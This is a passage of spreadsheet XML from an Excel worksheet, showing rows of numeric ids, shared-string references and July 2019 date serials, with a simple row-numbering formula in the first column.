      </c>
      <c r="B11754">
        <v>1753</v>
      </c>
      <c r="C11754" t="s">
        <v>19637</v>
      </c>
      <c r="D11754" s="1">
        <v>43668</v>
      </c>
      <c r="E11754" t="s">
        <v>20563</v>
      </c>
      <c r="F11754" t="s">
        <v>10021</v>
      </c>
      <c r="G11754" t="s">
        <v>21826</v>
      </c>
    </row>
    <row r="11755" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11755">
        <f t="shared" si="183"/>
        <v>11754</v>
      </c>
      <c r="B11755">
        <v>1754</v>
      </c>
      <c r="C11755" t="s">
        <v>19637</v>
      </c>
      <c r="D11755" s="1">
        <v>43670</v>
      </c>
      <c r="F11755" t="s">
        <v>10526</v>
      </c>
      <c r="G11755" t="s">
        <v>21827</v>
      </c>
    </row>
    <row r="11756" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11756">
        <f t="shared" si="183"/>
        <v>11755</v>
      </c>
      <c r="B11756">
        <v>1755</v>
      </c>
      <c r="C11756" t="s">
        <v>19637</v>
      </c>
      <c r="D11756" s="1">
        <v>43669</v>
      </c>
      <c r="E11756" t="s">
        <v>21828</v>
      </c>
      <c r="F11756" t="s">
        <v>10526</v>
      </c>
      <c r="G11756" t="s">
        <v>21829</v>
      </c>
    </row>
    <row r="11757" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11757">
        <f t="shared" si="183"/>
        <v>11756</v>
      </c>
      <c r="B11757">
        <v>1756</v>
      </c>
      <c r="C11757" t="s">
        <v>19637</v>
      </c>
      <c r="D11757" s="1">
        <v>43670</v>
      </c>
      <c r="E11757" t="s">
        <v>19917</v>
      </c>
      <c r="F11757" t="s">
        <v>9975</v>
      </c>
      <c r="G11757" t="s">
        <v>21830</v>
      </c>
    </row>
    <row r="11758" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11758">
        <f t="shared" si="183"/>
        <v>11757</v>
      </c>
      <c r="B11758">
        <v>1757</v>
      </c>
      <c r="C11758" t="s">
        <v>19637</v>
      </c>
      <c r="D11758" s="1">
        <v>43670</v>
      </c>
      <c r="E11758" t="s">
        <v>19650</v>
      </c>
      <c r="F11758" t="s">
        <v>10021</v>
      </c>
      <c r="G11758" t="s">
        <v>21831</v>
      </c>
    </row>
    <row r="11759" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11759">
        <f t="shared" si="183"/>
        <v>11758</v>
      </c>
      <c r="B11759">
        <v>1758</v>
      </c>
      <c r="C11759" t="s">
        <v>19637</v>
      </c>
      <c r="D11759" s="1">
        <v>43670</v>
      </c>
      <c r="E11759" t="s">
        <v>20253</v>
      </c>
      <c r="F11759" t="s">
        <v>9978</v>
      </c>
      <c r="G11759" t="s">
        <v>21832</v>
      </c>
    </row>
    <row r="11760" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11760">
        <f t="shared" si="183"/>
        <v>11759</v>
      </c>
      <c r="B11760">
        <v>1759</v>
      </c>
      <c r="C11760" t="s">
        <v>19637</v>
      </c>
      <c r="D11760" s="1">
        <v>43668</v>
      </c>
      <c r="E11760" t="s">
        <v>19643</v>
      </c>
      <c r="F11760" t="s">
        <v>10021</v>
      </c>
      <c r="G11760" t="s">
        <v>21833</v>
      </c>
    </row>
    <row r="11761" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11761">
        <f t="shared" si="183"/>
        <v>11760</v>
      </c>
      <c r="B11761">
        <v>1760</v>
      </c>
      <c r="C11761" t="s">
        <v>19637</v>
      </c>
      <c r="D11761" s="1">
        <v>43672</v>
      </c>
      <c r="E11761" t="s">
        <v>21834</v>
      </c>
      <c r="F11761" t="s">
        <v>10526</v>
      </c>
      <c r="G11761" t="s">
        <v>21835</v>
      </c>
    </row>
    <row r="11762" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11762">
        <f t="shared" si="183"/>
        <v>11761</v>
      </c>
      <c r="B11762">
        <v>1761</v>
      </c>
      <c r="C11762" t="s">
        <v>19637</v>
      </c>
      <c r="D11762" s="1">
        <v>43676</v>
      </c>
      <c r="E11762" t="s">
        <v>19640</v>
      </c>
      <c r="F11762" t="s">
        <v>10021</v>
      </c>
      <c r="G11762" t="s">
        <v>21836</v>
      </c>
    </row>
    <row r="11763" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11763">
        <f t="shared" si="183"/>
        <v>11762</v>
      </c>
      <c r="B11763">
        <v>1762</v>
      </c>
      <c r="C11763" t="s">
        <v>19637</v>
      </c>
      <c r="D11763" s="1">
        <v>43670</v>
      </c>
      <c r="F11763" t="s">
        <v>10526</v>
      </c>
      <c r="G11763" t="s">
        <v>21837</v>
      </c>
    </row>
    <row r="11764" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11764">
        <f t="shared" si="183"/>
        <v>11763</v>
      </c>
      <c r="B11764">
        <v>1763</v>
      </c>
      <c r="C11764" t="s">
        <v>19637</v>
      </c>
      <c r="D11764" s="1">
        <v>43676</v>
      </c>
      <c r="E11764" t="s">
        <v>21838</v>
      </c>
      <c r="F11764" t="s">
        <v>10021</v>
      </c>
      <c r="G11764" t="s">
        <v>21839</v>
      </c>
    </row>
    <row r="11765" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11765">
        <f t="shared" si="183"/>
        <v>11764</v>
      </c>
      <c r="B11765">
        <v>1764</v>
      </c>
      <c r="C11765" t="s">
        <v>19637</v>
      </c>
      <c r="D11765" s="1">
        <v>43675</v>
      </c>
      <c r="E11765" t="s">
        <v>21840</v>
      </c>
      <c r="F11765" t="s">
        <v>10021</v>
      </c>
      <c r="G11765" t="s">
        <v>21841</v>
      </c>
    </row>
    <row r="11766" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11766">
        <f t="shared" si="183"/>
        <v>11765</v>
      </c>
      <c r="B11766">
        <v>1765</v>
      </c>
      <c r="C11766" t="s">
        <v>19637</v>
      </c>
      <c r="D11766" s="1">
        <v>43671</v>
      </c>
      <c r="E11766" t="s">
        <v>21842</v>
      </c>
      <c r="F11766" t="s">
        <v>10526</v>
      </c>
      <c r="G11766" t="s">
        <v>21843</v>
      </c>
    </row>
    <row r="11767" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11767">
        <f t="shared" si="183"/>
        <v>11766</v>
      </c>
      <c r="B11767">
        <v>1766</v>
      </c>
      <c r="C11767" t="s">
        <v>19637</v>
      </c>
      <c r="D11767" s="1">
        <v>43671</v>
      </c>
      <c r="F11767" t="s">
        <v>10021</v>
      </c>
      <c r="G11767" t="s">
        <v>21844</v>
      </c>
    </row>
    <row r="11768" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11768">
        <f t="shared" si="183"/>
        <v>11767</v>
      </c>
      <c r="B11768">
        <v>1767</v>
      </c>
      <c r="C11768" t="s">
        <v>19637</v>
      </c>
      <c r="D11768" s="1">
        <v>43675</v>
      </c>
      <c r="E11768" t="s">
        <v>21235</v>
      </c>
      <c r="F11768" t="s">
        <v>10021</v>
      </c>
      <c r="G11768" t="s">
        <v>21845</v>
      </c>
    </row>
    <row r="11769" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11769">
        <f t="shared" si="183"/>
        <v>11768</v>
      </c>
      <c r="B11769">
        <v>1768</v>
      </c>
      <c r="C11769" t="s">
        <v>19637</v>
      </c>
      <c r="D11769" s="1">
        <v>43675</v>
      </c>
      <c r="E11769" t="s">
        <v>19640</v>
      </c>
      <c r="F11769" t="s">
        <v>10021</v>
      </c>
      <c r="G11769" t="s">
        <v>21846</v>
      </c>
    </row>
    <row r="11770" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11770">
        <f t="shared" si="183"/>
        <v>11769</v>
      </c>
      <c r="B11770">
        <v>1769</v>
      </c>
      <c r="C11770" t="s">
        <v>19637</v>
      </c>
      <c r="D11770" s="1">
        <v>43668</v>
      </c>
      <c r="E11770" t="s">
        <v>20563</v>
      </c>
      <c r="F11770" t="s">
        <v>10021</v>
      </c>
      <c r="G11770" t="s">
        <v>21847</v>
      </c>
    </row>
    <row r="11771" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11771">
        <f t="shared" si="183"/>
        <v>11770</v>
      </c>
      <c r="B11771">
        <v>1770</v>
      </c>
      <c r="C11771" t="s">
        <v>19637</v>
      </c>
      <c r="D11771" s="1">
        <v>43676</v>
      </c>
      <c r="E11771" t="s">
        <v>19690</v>
      </c>
      <c r="F11771" t="s">
        <v>9978</v>
      </c>
      <c r="G11771" t="s">
        <v>21848</v>
      </c>
    </row>
    <row r="11772" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11772">
        <f t="shared" si="183"/>
        <v>11771</v>
      </c>
      <c r="B11772">
        <v>1771</v>
      </c>
      <c r="C11772" t="s">
        <v>19637</v>
      </c>
      <c r="D11772" s="1">
        <v>43671</v>
      </c>
      <c r="E11772" t="s">
        <v>21524</v>
      </c>
      <c r="F11772" t="s">
        <v>10021</v>
      </c>
      <c r="G11772" t="s">
        <v>21849</v>
      </c>
    </row>
    <row r="11773" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11773">
        <f t="shared" si="183"/>
        <v>11772</v>
      </c>
      <c r="B11773">
        <v>1772</v>
      </c>
      <c r="C11773" t="s">
        <v>19637</v>
      </c>
      <c r="D11773" s="1">
        <v>43668</v>
      </c>
      <c r="E11773" t="s">
        <v>21850</v>
      </c>
      <c r="F11773" t="s">
        <v>10526</v>
      </c>
      <c r="G11773" t="s">
        <v>21851</v>
      </c>
    </row>
    <row r="11774" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11774">
        <f t="shared" si="183"/>
        <v>11773</v>
      </c>
      <c r="B11774">
        <v>1773</v>
      </c>
      <c r="C11774" t="s">
        <v>19637</v>
      </c>
      <c r="D11774" s="1">
        <v>43669</v>
      </c>
      <c r="E11774" t="s">
        <v>21852</v>
      </c>
      <c r="F11774" t="s">
        <v>9975</v>
      </c>
      <c r="G11774" t="s">
        <v>21853</v>
      </c>
    </row>
    <row r="11775" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11775">
        <f t="shared" si="183"/>
        <v>11774</v>
      </c>
      <c r="B11775">
        <v>1774</v>
      </c>
      <c r="C11775" t="s">
        <v>19637</v>
      </c>
      <c r="D11775" s="1">
        <v>43670</v>
      </c>
      <c r="E11775" t="s">
        <v>20515</v>
      </c>
      <c r="F11775" t="s">
        <v>10021</v>
      </c>
      <c r="G11775" t="s">
        <v>21854</v>
      </c>
    </row>
    <row r="11776" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11776">
        <f t="shared" si="183"/>
        <v>11775</v>
      </c>
      <c r="B11776">
        <v>1775</v>
      </c>
      <c r="C11776" t="s">
        <v>19637</v>
      </c>
      <c r="D11776" s="1">
        <v>43669</v>
      </c>
      <c r="F11776" t="s">
        <v>10526</v>
      </c>
      <c r="G11776" t="s">
        <v>21855</v>
      </c>
    </row>
    <row r="11777" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11777">
        <f t="shared" si="183"/>
        <v>11776</v>
      </c>
      <c r="B11777">
        <v>1776</v>
      </c>
      <c r="C11777" t="s">
        <v>19637</v>
      </c>
      <c r="D11777" s="1">
        <v>43673</v>
      </c>
      <c r="E11777" t="s">
        <v>19640</v>
      </c>
      <c r="F11777" t="s">
        <v>10021</v>
      </c>
      <c r="G11777" t="s">
        <v>21856</v>
      </c>
    </row>
    <row r="11778" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11778">
        <f t="shared" si="183"/>
        <v>11777</v>
      </c>
      <c r="B11778">
        <v>1777</v>
      </c>
      <c r="C11778" t="s">
        <v>19637</v>
      </c>
      <c r="D11778" s="1">
        <v>43669</v>
      </c>
      <c r="E11778" t="s">
        <v>21857</v>
      </c>
      <c r="F11778" t="s">
        <v>10526</v>
      </c>
      <c r="G11778" t="s">
        <v>21858</v>
      </c>
    </row>
    <row r="11779" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11779">
        <f t="shared" ref="A11779:A11842" si="184">+ROW(A11778)</f>
        <v>11778</v>
      </c>
      <c r="B11779">
        <v>1778</v>
      </c>
      <c r="C11779" t="s">
        <v>19637</v>
      </c>
      <c r="D11779" s="1">
        <v>43677</v>
      </c>
      <c r="E11779" t="s">
        <v>19640</v>
      </c>
      <c r="F11779" t="s">
        <v>10526</v>
      </c>
      <c r="G11779" t="s">
        <v>21859</v>
      </c>
    </row>
    <row r="11780" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11780">
        <f t="shared" si="184"/>
        <v>11779</v>
      </c>
      <c r="B11780">
        <v>1779</v>
      </c>
      <c r="C11780" t="s">
        <v>19637</v>
      </c>
      <c r="D11780" s="1">
        <v>43671</v>
      </c>
      <c r="E11780" t="s">
        <v>19879</v>
      </c>
      <c r="F11780" t="s">
        <v>10021</v>
      </c>
      <c r="G11780" t="s">
        <v>21860</v>
      </c>
    </row>
    <row r="11781" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11781">
        <f t="shared" si="184"/>
        <v>11780</v>
      </c>
      <c r="B11781">
        <v>1780</v>
      </c>
      <c r="C11781" t="s">
        <v>19637</v>
      </c>
      <c r="D11781" s="1">
        <v>43671</v>
      </c>
      <c r="E11781" t="s">
        <v>20767</v>
      </c>
      <c r="F11781" t="s">
        <v>10021</v>
      </c>
      <c r="G11781" t="s">
        <v>21861</v>
      </c>
    </row>
    <row r="11782" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11782">
        <f t="shared" si="184"/>
        <v>11781</v>
      </c>
      <c r="B11782">
        <v>1781</v>
      </c>
      <c r="C11782" t="s">
        <v>19637</v>
      </c>
      <c r="D11782" s="1">
        <v>43676</v>
      </c>
      <c r="E11782" t="s">
        <v>21862</v>
      </c>
      <c r="F11782" t="s">
        <v>9975</v>
      </c>
      <c r="G11782" t="s">
        <v>21863</v>
      </c>
    </row>
    <row r="11783" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11783">
        <f t="shared" si="184"/>
        <v>11782</v>
      </c>
      <c r="B11783">
        <v>1782</v>
      </c>
      <c r="C11783" t="s">
        <v>19637</v>
      </c>
      <c r="D11783" s="1">
        <v>43676</v>
      </c>
      <c r="E11783" t="s">
        <v>21235</v>
      </c>
      <c r="F11783" t="s">
        <v>10021</v>
      </c>
      <c r="G11783" t="s">
        <v>21864</v>
      </c>
    </row>
    <row r="11784" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11784">
        <f t="shared" si="184"/>
        <v>11783</v>
      </c>
      <c r="B11784">
        <v>1783</v>
      </c>
      <c r="C11784" t="s">
        <v>19637</v>
      </c>
      <c r="D11784" s="1">
        <v>43670</v>
      </c>
      <c r="E11784" t="s">
        <v>19640</v>
      </c>
      <c r="F11784" t="s">
        <v>9975</v>
      </c>
      <c r="G11784" t="s">
        <v>21865</v>
      </c>
    </row>
    <row r="11785" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11785">
        <f t="shared" si="184"/>
        <v>11784</v>
      </c>
      <c r="B11785">
        <v>1784</v>
      </c>
      <c r="C11785" t="s">
        <v>19637</v>
      </c>
      <c r="D11785" s="1">
        <v>43669</v>
      </c>
      <c r="E11785" t="s">
        <v>21866</v>
      </c>
      <c r="F11785" t="s">
        <v>10526</v>
      </c>
      <c r="G11785" t="s">
        <v>21867</v>
      </c>
    </row>
    <row r="11786" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11786">
        <f t="shared" si="184"/>
        <v>11785</v>
      </c>
      <c r="B11786">
        <v>1785</v>
      </c>
      <c r="C11786" t="s">
        <v>19637</v>
      </c>
      <c r="D11786" s="1">
        <v>43672</v>
      </c>
      <c r="E11786" t="s">
        <v>19715</v>
      </c>
      <c r="F11786" t="s">
        <v>10021</v>
      </c>
      <c r="G11786" t="s">
        <v>21868</v>
      </c>
    </row>
    <row r="11787" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11787">
        <f t="shared" si="184"/>
        <v>11786</v>
      </c>
      <c r="B11787">
        <v>1786</v>
      </c>
      <c r="C11787" t="s">
        <v>19637</v>
      </c>
      <c r="D11787" s="1">
        <v>43671</v>
      </c>
      <c r="E11787" t="s">
        <v>20081</v>
      </c>
      <c r="F11787" t="s">
        <v>10021</v>
      </c>
      <c r="G11787" t="s">
        <v>21869</v>
      </c>
    </row>
    <row r="11788" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11788">
        <f t="shared" si="184"/>
        <v>11787</v>
      </c>
      <c r="B11788">
        <v>1787</v>
      </c>
      <c r="C11788" t="s">
        <v>19637</v>
      </c>
      <c r="D11788" s="1">
        <v>43670</v>
      </c>
      <c r="F11788" t="s">
        <v>10526</v>
      </c>
      <c r="G11788" t="s">
        <v>21870</v>
      </c>
    </row>
    <row r="11789" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11789">
        <f t="shared" si="184"/>
        <v>11788</v>
      </c>
      <c r="B11789">
        <v>1788</v>
      </c>
      <c r="C11789" t="s">
        <v>19637</v>
      </c>
      <c r="D11789" s="1">
        <v>43676</v>
      </c>
      <c r="E11789" t="s">
        <v>20488</v>
      </c>
      <c r="F11789" t="s">
        <v>10526</v>
      </c>
      <c r="G11789" t="s">
        <v>21871</v>
      </c>
    </row>
    <row r="11790" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11790">
        <f t="shared" si="184"/>
        <v>11789</v>
      </c>
      <c r="B11790">
        <v>1789</v>
      </c>
      <c r="C11790" t="s">
        <v>19637</v>
      </c>
      <c r="D11790" s="1">
        <v>43668</v>
      </c>
      <c r="E11790" t="s">
        <v>21872</v>
      </c>
      <c r="F11790" t="s">
        <v>10526</v>
      </c>
      <c r="G11790" t="s">
        <v>21873</v>
      </c>
    </row>
    <row r="11791" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11791">
        <f t="shared" si="184"/>
        <v>11790</v>
      </c>
      <c r="B11791">
        <v>1790</v>
      </c>
      <c r="C11791" t="s">
        <v>19637</v>
      </c>
      <c r="D11791" s="1">
        <v>43672</v>
      </c>
      <c r="E11791" t="s">
        <v>19974</v>
      </c>
      <c r="F11791" t="s">
        <v>9978</v>
      </c>
      <c r="G11791" t="s">
        <v>21874</v>
      </c>
    </row>
    <row r="11792" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11792">
        <f t="shared" si="184"/>
        <v>11791</v>
      </c>
      <c r="B11792">
        <v>1791</v>
      </c>
      <c r="C11792" t="s">
        <v>19637</v>
      </c>
      <c r="D11792" s="1">
        <v>43669</v>
      </c>
      <c r="E11792" t="s">
        <v>21875</v>
      </c>
      <c r="F11792" t="s">
        <v>9978</v>
      </c>
      <c r="G11792" t="s">
        <v>21876</v>
      </c>
    </row>
    <row r="11793" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11793">
        <f t="shared" si="184"/>
        <v>11792</v>
      </c>
      <c r="B11793">
        <v>1792</v>
      </c>
      <c r="C11793" t="s">
        <v>19637</v>
      </c>
      <c r="D11793" s="1">
        <v>43670</v>
      </c>
      <c r="F11793" t="s">
        <v>9978</v>
      </c>
      <c r="G11793" t="s">
        <v>21877</v>
      </c>
    </row>
    <row r="11794" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11794">
        <f t="shared" si="184"/>
        <v>11793</v>
      </c>
      <c r="B11794">
        <v>1793</v>
      </c>
      <c r="C11794" t="s">
        <v>19637</v>
      </c>
      <c r="D11794" s="1">
        <v>43668</v>
      </c>
      <c r="E11794" t="s">
        <v>19643</v>
      </c>
      <c r="F11794" t="s">
        <v>10021</v>
      </c>
      <c r="G11794" t="s">
        <v>21878</v>
      </c>
    </row>
    <row r="11795" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11795">
        <f t="shared" si="184"/>
        <v>11794</v>
      </c>
      <c r="B11795">
        <v>1794</v>
      </c>
      <c r="C11795" t="s">
        <v>19637</v>
      </c>
      <c r="D11795" s="1">
        <v>43669</v>
      </c>
      <c r="F11795" t="s">
        <v>10526</v>
      </c>
      <c r="G11795" t="s">
        <v>21879</v>
      </c>
    </row>
    <row r="11796" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11796">
        <f t="shared" si="184"/>
        <v>11795</v>
      </c>
      <c r="B11796">
        <v>1795</v>
      </c>
      <c r="C11796" t="s">
        <v>19637</v>
      </c>
      <c r="D11796" s="1">
        <v>43670</v>
      </c>
      <c r="E11796" t="s">
        <v>19785</v>
      </c>
      <c r="F11796" t="s">
        <v>9975</v>
      </c>
      <c r="G11796" t="s">
        <v>21880</v>
      </c>
    </row>
    <row r="11797" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11797">
        <f t="shared" si="184"/>
        <v>11796</v>
      </c>
      <c r="B11797">
        <v>1796</v>
      </c>
      <c r="C11797" t="s">
        <v>19637</v>
      </c>
      <c r="D11797" s="1">
        <v>43668</v>
      </c>
      <c r="E11797" t="s">
        <v>21881</v>
      </c>
      <c r="F11797" t="s">
        <v>10526</v>
      </c>
      <c r="G11797" t="s">
        <v>21882</v>
      </c>
    </row>
    <row r="11798" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11798">
        <f t="shared" si="184"/>
        <v>11797</v>
      </c>
      <c r="B11798">
        <v>1797</v>
      </c>
      <c r="C11798" t="s">
        <v>19637</v>
      </c>
      <c r="D11798" s="1">
        <v>43676</v>
      </c>
      <c r="E11798" t="s">
        <v>21883</v>
      </c>
      <c r="F11798" t="s">
        <v>10526</v>
      </c>
      <c r="G11798" t="s">
        <v>21884</v>
      </c>
    </row>
    <row r="11799" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11799">
        <f t="shared" si="184"/>
        <v>11798</v>
      </c>
      <c r="B11799">
        <v>1798</v>
      </c>
      <c r="C11799" t="s">
        <v>19637</v>
      </c>
      <c r="D11799" s="1">
        <v>43669</v>
      </c>
      <c r="E11799" t="s">
        <v>19715</v>
      </c>
      <c r="F11799" t="s">
        <v>10021</v>
      </c>
      <c r="G11799" t="s">
        <v>21885</v>
      </c>
    </row>
    <row r="11800" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11800">
        <f t="shared" si="184"/>
        <v>11799</v>
      </c>
      <c r="B11800">
        <v>1799</v>
      </c>
      <c r="C11800" t="s">
        <v>19637</v>
      </c>
      <c r="D11800" s="1">
        <v>43670</v>
      </c>
      <c r="E11800" t="s">
        <v>21886</v>
      </c>
      <c r="F11800" t="s">
        <v>9975</v>
      </c>
      <c r="G11800" t="s">
        <v>21887</v>
      </c>
    </row>
    <row r="11801" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11801">
        <f t="shared" si="184"/>
        <v>11800</v>
      </c>
      <c r="B11801">
        <v>1800</v>
      </c>
      <c r="C11801" t="s">
        <v>19637</v>
      </c>
      <c r="D11801" s="1">
        <v>43671</v>
      </c>
      <c r="E11801" t="s">
        <v>19796</v>
      </c>
      <c r="F11801" t="s">
        <v>10021</v>
      </c>
      <c r="G11801" t="s">
        <v>21888</v>
      </c>
    </row>
    <row r="11802" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11802">
        <f t="shared" si="184"/>
        <v>11801</v>
      </c>
      <c r="B11802">
        <v>1801</v>
      </c>
      <c r="C11802" t="s">
        <v>19637</v>
      </c>
      <c r="D11802" s="1">
        <v>43676</v>
      </c>
      <c r="E11802" t="s">
        <v>19640</v>
      </c>
      <c r="F11802" t="s">
        <v>10021</v>
      </c>
      <c r="G11802" t="s">
        <v>21889</v>
      </c>
    </row>
    <row r="11803" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11803">
        <f t="shared" si="184"/>
        <v>11802</v>
      </c>
      <c r="B11803">
        <v>1802</v>
      </c>
      <c r="C11803" t="s">
        <v>19637</v>
      </c>
      <c r="D11803" s="1">
        <v>43677</v>
      </c>
      <c r="E11803" t="s">
        <v>21422</v>
      </c>
      <c r="F11803" t="s">
        <v>10526</v>
      </c>
      <c r="G11803" t="s">
        <v>21890</v>
      </c>
    </row>
    <row r="11804" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11804">
        <f t="shared" si="184"/>
        <v>11803</v>
      </c>
      <c r="B11804">
        <v>1803</v>
      </c>
      <c r="C11804" t="s">
        <v>19637</v>
      </c>
      <c r="D11804" s="1">
        <v>43677</v>
      </c>
      <c r="F11804" t="s">
        <v>10526</v>
      </c>
      <c r="G11804" t="s">
        <v>21891</v>
      </c>
    </row>
    <row r="11805" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11805">
        <f t="shared" si="184"/>
        <v>11804</v>
      </c>
      <c r="B11805">
        <v>1804</v>
      </c>
      <c r="C11805" t="s">
        <v>19637</v>
      </c>
      <c r="D11805" s="1">
        <v>43669</v>
      </c>
      <c r="E11805" t="s">
        <v>21566</v>
      </c>
      <c r="F11805" t="s">
        <v>10526</v>
      </c>
      <c r="G11805" t="s">
        <v>21892</v>
      </c>
    </row>
    <row r="11806" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11806">
        <f t="shared" si="184"/>
        <v>11805</v>
      </c>
      <c r="B11806">
        <v>1805</v>
      </c>
      <c r="C11806" t="s">
        <v>19637</v>
      </c>
      <c r="D11806" s="1">
        <v>43677</v>
      </c>
      <c r="E11806" t="s">
        <v>21893</v>
      </c>
      <c r="F11806" t="s">
        <v>10526</v>
      </c>
      <c r="G11806" t="s">
        <v>21894</v>
      </c>
    </row>
    <row r="11807" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11807">
        <f t="shared" si="184"/>
        <v>11806</v>
      </c>
      <c r="B11807">
        <v>1806</v>
      </c>
      <c r="C11807" t="s">
        <v>19637</v>
      </c>
      <c r="D11807" s="1">
        <v>43675</v>
      </c>
      <c r="E11807" t="s">
        <v>21895</v>
      </c>
      <c r="F11807" t="s">
        <v>10526</v>
      </c>
      <c r="G11807" t="s">
        <v>21896</v>
      </c>
    </row>
    <row r="11808" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11808">
        <f t="shared" si="184"/>
        <v>11807</v>
      </c>
      <c r="B11808">
        <v>1807</v>
      </c>
      <c r="C11808" t="s">
        <v>19637</v>
      </c>
      <c r="D11808" s="1">
        <v>43670</v>
      </c>
      <c r="E11808" t="s">
        <v>19750</v>
      </c>
      <c r="F11808" t="s">
        <v>9978</v>
      </c>
      <c r="G11808" t="s">
        <v>21897</v>
      </c>
    </row>
    <row r="11809" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11809">
        <f t="shared" si="184"/>
        <v>11808</v>
      </c>
      <c r="B11809">
        <v>1808</v>
      </c>
      <c r="C11809" t="s">
        <v>19637</v>
      </c>
      <c r="D11809" s="1">
        <v>43677</v>
      </c>
      <c r="E11809" t="s">
        <v>19687</v>
      </c>
      <c r="F11809" t="s">
        <v>10021</v>
      </c>
      <c r="G11809" t="s">
        <v>21898</v>
      </c>
    </row>
    <row r="11810" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11810">
        <f t="shared" si="184"/>
        <v>11809</v>
      </c>
      <c r="B11810">
        <v>1809</v>
      </c>
      <c r="C11810" t="s">
        <v>19637</v>
      </c>
      <c r="D11810" s="1">
        <v>43676</v>
      </c>
      <c r="E11810" t="s">
        <v>19705</v>
      </c>
      <c r="F11810" t="s">
        <v>10021</v>
      </c>
      <c r="G11810" t="s">
        <v>21899</v>
      </c>
    </row>
    <row r="11811" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11811">
        <f t="shared" si="184"/>
        <v>11810</v>
      </c>
      <c r="B11811">
        <v>1810</v>
      </c>
      <c r="C11811" t="s">
        <v>19637</v>
      </c>
      <c r="D11811" s="1">
        <v>43673</v>
      </c>
      <c r="E11811" t="s">
        <v>20250</v>
      </c>
      <c r="F11811" t="s">
        <v>10021</v>
      </c>
      <c r="G11811" t="s">
        <v>21900</v>
      </c>
    </row>
    <row r="11812" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11812">
        <f t="shared" si="184"/>
        <v>11811</v>
      </c>
      <c r="B11812">
        <v>1811</v>
      </c>
      <c r="C11812" t="s">
        <v>19637</v>
      </c>
      <c r="D11812" s="1">
        <v>43676</v>
      </c>
      <c r="E11812" t="s">
        <v>19785</v>
      </c>
      <c r="F11812" t="s">
        <v>9975</v>
      </c>
      <c r="G11812" t="s">
        <v>21901</v>
      </c>
    </row>
    <row r="11813" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11813">
        <f t="shared" si="184"/>
        <v>11812</v>
      </c>
      <c r="B11813">
        <v>1812</v>
      </c>
      <c r="C11813" t="s">
        <v>19637</v>
      </c>
      <c r="D11813" s="1">
        <v>43674</v>
      </c>
      <c r="E11813" t="s">
        <v>20813</v>
      </c>
      <c r="F11813" t="s">
        <v>10526</v>
      </c>
      <c r="G11813" t="s">
        <v>21902</v>
      </c>
    </row>
    <row r="11814" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11814">
        <f t="shared" si="184"/>
        <v>11813</v>
      </c>
      <c r="B11814">
        <v>1813</v>
      </c>
      <c r="C11814" t="s">
        <v>19637</v>
      </c>
      <c r="D11814" s="1">
        <v>43676</v>
      </c>
      <c r="E11814" t="s">
        <v>21903</v>
      </c>
      <c r="F11814" t="s">
        <v>10526</v>
      </c>
      <c r="G11814" t="s">
        <v>21904</v>
      </c>
    </row>
    <row r="11815" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11815">
        <f t="shared" si="184"/>
        <v>11814</v>
      </c>
      <c r="B11815">
        <v>1814</v>
      </c>
      <c r="C11815" t="s">
        <v>19637</v>
      </c>
      <c r="D11815" s="1">
        <v>43668</v>
      </c>
      <c r="E11815" t="s">
        <v>21905</v>
      </c>
      <c r="F11815" t="s">
        <v>10021</v>
      </c>
      <c r="G11815" t="s">
        <v>21906</v>
      </c>
    </row>
